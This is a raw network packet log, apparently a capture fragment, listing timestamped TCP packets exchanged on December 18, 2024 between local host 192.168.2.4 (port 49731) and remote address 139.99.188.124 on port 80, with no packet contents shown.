                                                          Dec 18, 2024 09:32:40.857511044 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.858529091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.858679056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.858720064 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.859771013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.859868050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.859915018 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.860898018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.861028910 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.861082077 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.862128973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.862248898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.862288952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.863362074 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.863472939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.863513947 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.864559889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.864649057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.864696980 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.865712881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.865772009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.865817070 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.866976023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.867029905 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.867073059 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.868201017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.868288040 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.868330956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.869347095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.869484901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.869527102 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.870532036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.870709896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.870753050 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.871764898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.871866941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.871911049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.873162985 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.873338938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.873380899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.874253988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.874310970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.874351025 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.875422001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.875511885 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.875549078 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.876596928 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.876661062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.876698971 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.877769947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.877868891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.877912998 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.879084110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.879185915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.879228115 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.880291939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.880332947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.880374908 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.881381989 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.881493092 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.881532907 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.882605076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.882702112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.882742882 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.883800983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.883924007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.883968115 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.885025024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.885101080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.885143042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.886190891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.886310101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.886348963 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.887418032 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.887571096 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.887610912 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.888654947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.888844967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.888884068 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.889811993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.889895916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.889933109 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.891024113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.891128063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.891165018 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.892215967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.892285109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.892330885 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.893465042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.893570900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.893615961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.894671917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.894747019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.894789934 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.895828009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.895924091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.895967007 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.897031069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.897128105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.897176027 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.898272038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.898389101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.898431063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.899436951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.953619957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.028240919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028256893 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028408051 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.028637886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028704882 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028747082 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.029901028 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.029990911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.030033112 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.031063080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.031115055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.031164885 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.032371044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.032468081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.032510042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.033611059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.033701897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.033742905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.034775019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.034853935 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.034899950 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.035902023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.036071062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.036113024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.037209988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.037331104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.037374973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.038295984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.038352013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.038393974 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.039541006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.039612055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.039653063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.040687084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.040839911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.040891886 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.041882992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.042053938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.042097092 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.043087006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.043188095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.043231964 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.044282913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.044401884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.044454098 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.045562983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.045629025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.045671940 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.046818018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.046868086 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.046902895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.047935009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.048080921 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.048122883 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.049107075 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.049222946 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.049263954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.050343990 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.050503016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.050544024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.051523924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.051692963 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.051734924 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.052742958 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.052757025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.052798033 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.053967953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.054066896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.054107904 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.055164099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.055290937 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.055332899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.056324959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.056443930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.056484938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.057533026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.057584047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.057625055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.058727026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.058844090 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.058883905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.059942007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.060055971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.060106039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.061214924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.061326027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.061367035 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.062359095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.062463999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.062510967 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.063606977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.063698053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.063743114 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.064766884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.064883947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.064934969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.065954924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.066123962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.066168070 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.067207098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.067331076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.067374945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.068388939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.068579912 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.068620920 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.069598913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.069747925 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.069797039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.070846081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.070982933 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.071024895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.072535992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.072643042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.072684050 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.073425055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.073719978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.073760986 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.075875998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.076087952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.076132059 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.077094078 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.077236891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.077276945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.078363895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.078476906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.078541994 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.079302073 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.079458952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.079499960 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.080137968 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.080249071 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.080288887 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.081038952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.081057072 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.081094027 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.081809044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.081867933 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.081908941 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.082839012 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.082890987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.082931042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.084079981 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.084214926 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.084260941 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.085227013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.085360050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.085402012 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.086447001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.086565018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.086610079 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.087652922 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.087769032 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.087812901 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.089520931 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.089598894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.089643955 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.090507030 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.090562105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.090605974 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.091938019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.141050100 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.219307899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.219336033 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.219425917 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.219696999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.220181942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.220195055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.220328093 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.221132994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.221179008 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.221296072 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.222336054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.222383022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.222440004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.223573923 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.223618984 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.223674059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.224749088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.224801064 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.224865913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.225996017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.226042032 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.226079941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.227339983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.227386951 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.227471113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.228389025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.228435040 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.228580952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.229562998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.229605913 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.229665041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.230988026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.231035948 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.231178999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.232203007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.232251883 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.232317924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.233237982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.233314037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.233346939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.234381914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.234426022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.234438896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.235593081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.235644102 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.235714912 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.236845970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.236897945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.236920118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.238038063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.238081932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.238142014 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.239279032 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.239330053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.239352942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.240379095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.240422010 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.240494967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.241657019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.241699934 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.241847992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.242818117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.242861032 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.242949963 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.244040012 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.244091988 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.244179964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.245219946 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.245268106 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.245323896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.246822119 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.246881008 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.246959925 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.248099089 CET8049731139.99.188.124192.168.2.4
